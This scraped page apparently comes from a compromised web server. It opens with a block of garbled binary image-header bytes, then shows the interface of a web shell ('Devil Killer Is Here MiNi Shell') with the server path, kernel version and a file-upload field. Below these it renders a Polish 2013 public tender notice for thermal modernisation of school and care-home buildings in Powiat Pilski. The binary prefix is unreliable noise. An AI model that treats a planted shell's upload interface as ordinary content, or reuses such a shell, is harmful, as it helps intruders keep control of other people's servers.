JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130627/248918-N-2013.html

<p class="kh_header"><b>Piła: Poprawa efektywności energetycznej poprzez termomodernizację obiektów użyteczności publicznej w powiecie pilskim</b><br>
<b>Numer ogłoszenia: 248918 - 2013; data zamieszczenia: 27.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Pilski reprezentowany przez Zarząd Powiatu w Pile , al. Niepodległości 33/35, 64-920 Piła, woj. wielkopolskie, tel. 67 2109442, faks 067 2109332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.pila.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa efektywności energetycznej poprzez termomodernizację obiektów użyteczności publicznej w powiecie pilskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane oznaczone tytułem: Poprawa efektywności energetycznej poprzez termomodernizację obiektów użyteczności publicznej w powiecie pilskim.  
2.	Przedmiot zamówienia stanowią roboty budowlane dotyczące wykonania termomodernizacji następujących obiektów:
1)	budynku internatu przy Zespole Szkół im. Stanisława Staszica w Pile,
2)	budynku hali sportowej Zespołu Szkół im. Stanisława Staszica w Pile,
3)	budynku głównego Domu Pomocy Społecznej w Rzadkowie,
4)	budynku mieszkalnego Domu Pomocy Społecznej w Rzadkowie.   
Budynek internatu przy Zespole Szkół im. Stanisława Staszica w Pile zaliczany jest do grupy 113 - budynki zbiorowego zamieszkania, wchodzących w skład działu 11 - budownictwo mieszkaniowe. 
Budynek hali sportowej Zespołu Szkół im. Stanisława Staszica w Pile nie jest zaliczany do grupy budynków zbiorowego zamieszkania. 
Budynek główny oraz budynek mieszkalny Domu Pomocy Społecznej w Rzadkowie również są zaliczane do grupy 113 - budynki zbiorowego zamieszkania, wchodzących w skład działu 11 - budownictwo mieszkaniowe. 
Dom Pomocy Społecznej w Rzadkowie przeznaczony jest dla dzieci i młodzieży niepełnosprawnej intelektualnie - dysponuje 66 miejscami stałego pobytu, siedzibą Domu jest wieś Rzadkowo, gmina Kaczory. Celem Domu jest świadczenie na poziomie obowiązującego standardu usług bytowych, opiekuńczych, wspomagających i edukacyjnych ze szczególnym uwzględnieniem wolności, intymności, godności i poczucia bezpieczeństwa, w formach i zakresie wynikającym z indywidualnych potrzeb oraz umożliwienie korzystania ze świadczeń przysługujących z tytułu powszechnego ubezpieczenia zdrowotnego.           
3 	Zakres robót obejmuje m. in:
1.	Budynek internatu przy Zespole Szkół im. Stanisława Staszica w Pile: 
1)	roboty budowlane:
- wymiana stolarki okiennej z drewnianej na PCV wraz z obsadzeniem parapetów zewnętrznych i wewnętrznych,
- wykonanie izolacji termicznej ścian zewnętrznych na przygotowanym podłożu ze styropianu gr. 14 cm wraz z wtopieniem siatki gruntem przeciwwilgociowym i tynkiem cienkowarstwowym, 
- ocieplenie ścian fundamentowych wraz z izolacją przeciwwilgociową i termiczną,
- wykonanie izolacji termicznej stropodachu poprzez wdmuchnięcie granulatu termoizolacyjnego ekofiber,
- wymiana obróbek blacharskich (rynien, rur spustowych i innych obróbek blacharskich),
- naprawa kominów wraz z odgruzowaniem przewodów kominowych,
- rozebranie komina po byłej kotłowni wraz z likwidacją otworu po kominie w stropie,
- rozebranie komina kuchni do poziomu istniejących kominów, 
- ułożenie jednej warstwy papy termozgrzewalnej grubości minimum 5,2 mm na powierzchni dachu,
- montaż instalacji odgromowej wraz z wykonaniem pomiarów,  
- zabudowa loggii ścianą bloczków z siporexu grubość 24 cm wraz z wykonaniem nadproża,
- zamurowanie wskazanych otworów okiennych piwnicznych,
- malowanie ścian wewnętrznych po wymianie stolarki okiennej i drzwiowej, 
2)	roboty instalacyjne:
- rozebranie instalacji centralnego ogrzewania oraz grzejników wraz z utylizacją złomu i innych materiałów z rozbiórki,
- montaż nowej instalacji centralnego ogrzewania wraz z wykonaniem prób szczelności,
- rozruch instalacji na gorąco wraz z regulacją.  
Zamawiający wymaga aby Wykonawca wykonując roboty na internacie brał pod uwagę fakt, że w miesiącu wrześniu i październiku internat jest obiektem czynnym i zamieszkanym. 
2.	Budynek hali sportowej Zespołu Szkół im. Stanisława Staszica w Pile:
1)	roboty budowlane:
- przygotowanie otworów związanych z instalacją nawiewno - wywiewną,
- wymiana stolarki okiennej wraz z osadzeniem parapetów wewnętrznych i zewnętrznych,
- przygotowanie podłoża ścian zewnętrznych do wykonania izolacji termicznej ze styropianu gr. 14 cm wraz z wtopieniem siatki gruntem przeciwwilgociowym i tynkiem cienkowarstwowym,
- wykonanie izolacji przeciwwilgociowej ścian fundamentowych wraz z izolacją termiczną,
- wykonanie instalacji elektrycznej zasilającej elementy wentylacji,
- montaż urządzeń i elementów wentylacji nawiewno - wywiewnej,
- wykonanie pomiarów elektrycznych,
- wykonanie regulacji urządzeń wentylacyjnych wraz z pomiarem wydajności,
- wywiezienie oraz utylizacja odpadów,
- zabezpieczenie terenu budowy. 
Zakres robót termomodernizacyjnych nie obejmuje dachu hali. 
3.	Budynek główny Domu Pomocy Społecznej w Rzadkowie: 
1)	roboty budowlane:
- wymiana stolarki drzwiowej i okiennej wraz z obsadzeniem parapetów zewnętrznych i wewnętrznych,
- wykonanie izolacji termicznej ścian zewnętrznych na przygotowanym podłożu ze styropianu gr. 14 cm wraz z wtopieniem siatki gruntem przeciwwilgociowym i tynkiem cienkowarstwowym, 
- ocieplenie ścian fundamentowych wraz z izolacją przeciwwilgociową i termiczną,
- wykonanie opaski z kostki betonowej wokół budynku,
- wykonanie izolacji termicznej stropodachu poprzez wdmuchnięcie granulatu termoizolacyjnego ekofiber,
- wymiana obróbek blacharskich (rynien, rur spustowych i innych obróbek blacharskich),
- naprawa kominów wraz z odgruzowaniem przewodów kominowych,
- ułożenie jednej warstwy papy termozgrzewalnej grubości minimum 5,2 mm na powierzchni dachu wraz z kominkami wentylacyjnymi,
- wymiana instalacji odgromowej wraz z wykonaniem pomiarów,  
- malowanie ścian wewnętrznych po wymianie stolarki okiennej i drzwiowej,
- zabezpieczenie terenu robót zgodnie z projektem.
2)	roboty instalacyjne:
- rozebranie instalacji centralnego ogrzewania oraz grzejników wraz z utylizacją złomu i innych materiałów z rozbiórki,
- montaż nowej instalacji centralnego ogrzewania wraz z wykonaniem prób szczelności,
- rozruch instalacji na gorąco wraz z regulacją.
4.	Budynek mieszkalny Domu Pomocy Społecznej w Rzadkowie: 
1)	roboty budowlane:
- wykonanie izolacji termicznej dachu łącznika między budynkami wraz z wymianą pokrycia na blacho dachówkę, 
- wymiana stolarki drzwiowej i okiennej wraz z obsadzeniem parapetów zewnętrznych i wewnętrznych,
- wykonanie izolacji termicznej ścian zewnętrznych na przygotowanym podłożu ze styropianu gr. 14 cm wraz z wtopieniem siatki, gruntem przeciwwilgociowym i tynkiem cienkowarstwowym,  
- ocieplenie ścian fundamentowych wraz z izolacją przeciwwilgociową i termiczną,
- wykonanie opaski z kostki betonowej wokół budynku,
2)	roboty instalacyjne:
- rozebranie instalacji centralnego ogrzewania oraz grzejników wraz z utylizacją złomu i innych materiałów z rozbiórki,
- montaż nowej instalacji centralnego ogrzewania wraz z wykonaniem prób szczelności,
			- rozruch instalacji na gorąco wraz z regulacją. 
Zamawiający wymaga aby Wykonawca realizując zamówienie brał pod uwagę charakter obiektu jakim jest Dom Pomocy Społecznej w Rzadkowie (pkt. 3.2 SIWZ). 
4.	Wymagania dotyczące materiałów, które należy zastosować realizując zamówienie zostały określone w dokumentacji projektowej dla każdego budynku natomiast dla hali sportowej w dokumentacji a także w dokumencie - Wymogi dotyczące systemu ocieplenia ścian w Załączniku nr 8 do SIWZ.   
5.	Szczegółowo przedmiot zamówienia jest opisany w dokumentacji projektowej,  specyfikacji technicznej wykonania i odbioru robót budowlanych, które stanowią załącznik nr 8 do SIWZ. Wykonawca zobowiązuje się wykonać roboty zgodnie z w/w dokumentacją. Materiały użyte do wykonania zamówienia muszą spełniać wymogi określone w w/w dokumentacji. Gdy w specyfikacji istotnych warunków zamówienia w tym również w jej załącznikach znajdą się określenia konkretnych marek lub nazwy producentów Zamawiający dopuszcza zaoferowanie materiałów równoważnych w stosunku do wymienionych o parametrach nie gorszych od parametrów wskazanych w SIWZ. Materiały równoważne muszą spełniać wymagania, o których mowa w pkt 3.4. SIWZ.  
6.	Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej terenu robót i jego otoczenia. 
7.	W cenie oferty należy uwzględnić koszt zajęcia pasa drogowego, robót tymczasowych i towarzyszących, zabezpieczających, inwentaryzację geodezyjną powykonawczą, koszty ubezpieczenia robót. 
8.	Zamawiający wymaga, aby Wykonawca ubezpieczył roboty na zasadach określonych w pkt 5.5 SIWZ. 
9.	Wykonawca nie może zaoferować terminu rękojmi za wady oraz gwarancji na wykonane roboty budowlane krótszego niż 36 miesięcy a na wbudowaną stolarkę 60 miesięcy. 
W przypadku, gdy producent udziela gwarancji na okres dłuższy niż określony powyżej obowiązuje gwarancja producenta. 
10.	Materiały budowlane użyte do wykonania zamówienia muszą odpowiadać, co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie oraz posiadać aktualne atesty lub deklaracje zgodności z aprobatą techniczną oraz inne dokumenty wskazane w dokumentacji projektowej. 
11.	W przypadku powierzenia wykonania części zamówienia podwykonawcom, Wykonawca jest zobowiązany wskazać w ofercie części zamówienia, której wykonanie powierzy podwykonawcom.
12.	Warunki zapłaty: 
- Każdy z termomodernizowanych obiektów będzie rozliczany oddzielnie.
- Za roboty na każdym obiekcie Wykonawca wystawi trzy faktury VAT. Ostatnią fakturę Wykonawca wystawi  po bezusterkowym odbiorze końcowym robót na danym obiekcie. Wartość ostatniej faktury nie może być niższa niż 30% ceny zaoferowanej dla danego obiektu. Wykonawca do każdej wystawionej faktury VAT dołączy oświadczenie podwykonawców o uiszczeniu wszelkich wymaganych wierzytelności im przysługujących, powstałych w związku z realizacją robót będących przedmiotem zamówienia;
- Do każdej faktury Wykonawca dołączy bezusterkowy protokół wykonania robót podpisany przez inspektora nadzoru inwestorskiego oraz uzyska potwierdzenie dyrektora zarządzającego danym obiektem. 
- Płatnikiem faktur jest Powiat Pilski. Faktury należy składać w Starostwie Powiatowym w Pile przy al. Niepodległości 33/35 - dotyczące części pierwszej zamówienia - w Wydziale Oświaty, dotyczące części drugiej zamówienia - w Wydziale Współpracy i Aktywizacji Osób Niepełnosprawnych.  
- Termin zapłaty faktury - do 21 dni od dnia doręczenia faktury Zamawiającemu.
13.	 Harmonogram rzeczowo-finansowy:
- Wybrany Wykonawca przedłoży Zamawiającemu przed zawarciem umowy harmonogram rzeczowo-finansowy w celu zatwierdzenia przez Zamawiającego. Harmonogram będzie załącznikiem do umowy.
- W harmonogramie należy przedstawić planowany postęp rzeczowy robót w odstępach dwutygodniowych osobno dla każdego obiektu. 
- Przy sporządzaniu harmonogramu należy uwzględnić zapisy pkt 3.12 oraz pkt 4 SIWZ.
14.Wymagania Zamawiającego dotyczące ubezpieczenia robót: 
Wykonawca zobowiąże się w złożonej ofercie, że ubezpieczy roboty w zakładzie ubezpieczeń na następujących warunkach:
Wykonawca zobowiązuje się do posiadania, ważnego w dniu przystąpienia do realizacji zamówienia, ubezpieczenia wszystkich ryzyk budowy/montażu (CAR/EAR) obejmującego co najmniej:
a)	pełną wartość kontraktu (umowy);
b)	objęcie ochroną wszystkich stron: inwestor, główny wykonawca, podwykonawcy;
c)	klauzulę reprezentantów ograniczającą wyłączenie winy umyślnej i rażącego niedbalstwa jedynie do zarządu wykonawcy; 
d)	ubezpieczenie ryzyka producenta;
e)	koszty usunięcia pozostałości po szkodzie;
f)	klauzule rozszerzające ochronę ubezpieczeniową o szkody w trakcie okresu gwarancyjnego;
g)	klauzule rozszerzające ochronę ubezpieczeniową o szkody związane z konserwacją - kolejne 12 miesięcy po wygaśnięciu okresu gwarancyjnego;
h)	klauzulę rozszerzającą ochronę ubezpieczeniową o ryzyko projektanta; 
i)	klauzulę rozszerzającą ochronę ubezpieczeniową o szkody w elementach oddanych do użytku; 
j)	klauzulę rozszerzającą ochronę ubezpieczeniową o szkody w mieniu otaczającym - limit min. 10% wartości kontraktu;
k)	klauzulę rozszerzającą ochronę ubezpieczeniową o szkody w podziemnych kablach, rurach, urządzeniach jak również różnego rodzaju instalacjach;
l)	klauzulę rozszerzającą ochronę ubezpieczeniową o szkody powstałe w wyniku wibracji, usunięcia lub osłabienia elementów nośnych.
Franszyzy lub udziały własne będą określone kwotowo i nie przekroczą 5.000 zł.
W przypadku ekspiracji ubezpieczenia CAR/EAR w trakcie trwania umowy, której dotyczy zamówienie, Wykonawca na 14 dni przed końcem obowiązywania ochrony ubezpieczeniowej, zobowiązany będzie do przedłożenia polisy na kolejny okres w zakresie nie gorszym niż dotychczasowa polisa.
Wykonawca zobowiązuje się do dostarczenia Zamawiającemu najpóźniej w dniu zawarcia umowy oryginału lub poświadczonej kopii polisy ubezpieczeniowej lub innego dokumentu ubezpieczenia potwierdzającego ubezpieczenie robót na powyższych warunkach wraz ze wszystkimi załącznikami oraz dowodem zapłaty całości składki..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.32.40.00-4, 45.42.10.00-4, 45.23.10.00-4, 45.33.11.00-7, 45.31.23.10-3, 45.45.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu jest obowiązany wnieść wadium. Wysokość wadium wynosi 50 000,00 złotych (pięćdziesiąt tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać niezbędną wiedzę i doświadczenie. Wykonawca w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie zrealizował co najmniej dwie roboty budowlane rozumiane jako dwa zamówienia/dwie umowy, polegające na kompleksowej termomodernizacji obiektu lub obiektów użyteczności publicznej o łącznej wartości co najmniej 3 500 000 zł brutto (słownie: trzy miliony pięćset tysięcy złotych). 
	Pod pojęciem kompleksowej termomodernizacji Zamawiający rozumie termomodernizację obejmującą m. in. wymianę okien, wymianę centralnego ogrzewania, docieplenie ścian i położenie tynków, wykonanie izolacji termicznej dachu lub stropodachu oraz wymianę obróbek blacharskich.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami zdolnymi do realizacji zamówienia. Zamawiający wymaga, aby Wykonawca dysponował następującymi osobami posiadającymi uprawnienia do sprawowania samodzielnych funkcji w budownictwie odpowiedzialnymi za kierowanie robotami: 
- kierownik budowy - uprawnienia budowlane w specjalności konstrukcyjno-budowlanej,
- 	kierownik robót ogólnobudowlanych,
- 	kierownik robót sanitarnych (instalacyjnych) - uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych, 
- 	kierownik robót elektrycznych - uprawnienia budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej gwarantującej wykonanie zamówienia i w tym względzie udokumentuje, że dysponuje środkami finansowymi lub zdolnością kredytową w wysokości nie mniejszej niż 1 200 000 złotych (jeden milion dwieście tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zobowiązanie Wykonawcy do ubezpieczenia robót na warunkach określonych w pkt 5.5 SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz Oferta - załącznik nr 1 do SIWZ.
2.	Pełnomocnictwo do podpisania oferty jeżeli forma reprezentacji nie wynika z  innych dokumentów złożonych wraz z ofertą.
3.	Informacja o zatrudnieniu podwykonawców robót - na formularzu zgodnym z treścią załącznika Nr 5 do SIWZ.
4.	Kosztorys ofertowy - zgodnie z pkt. 17 SIWZ.
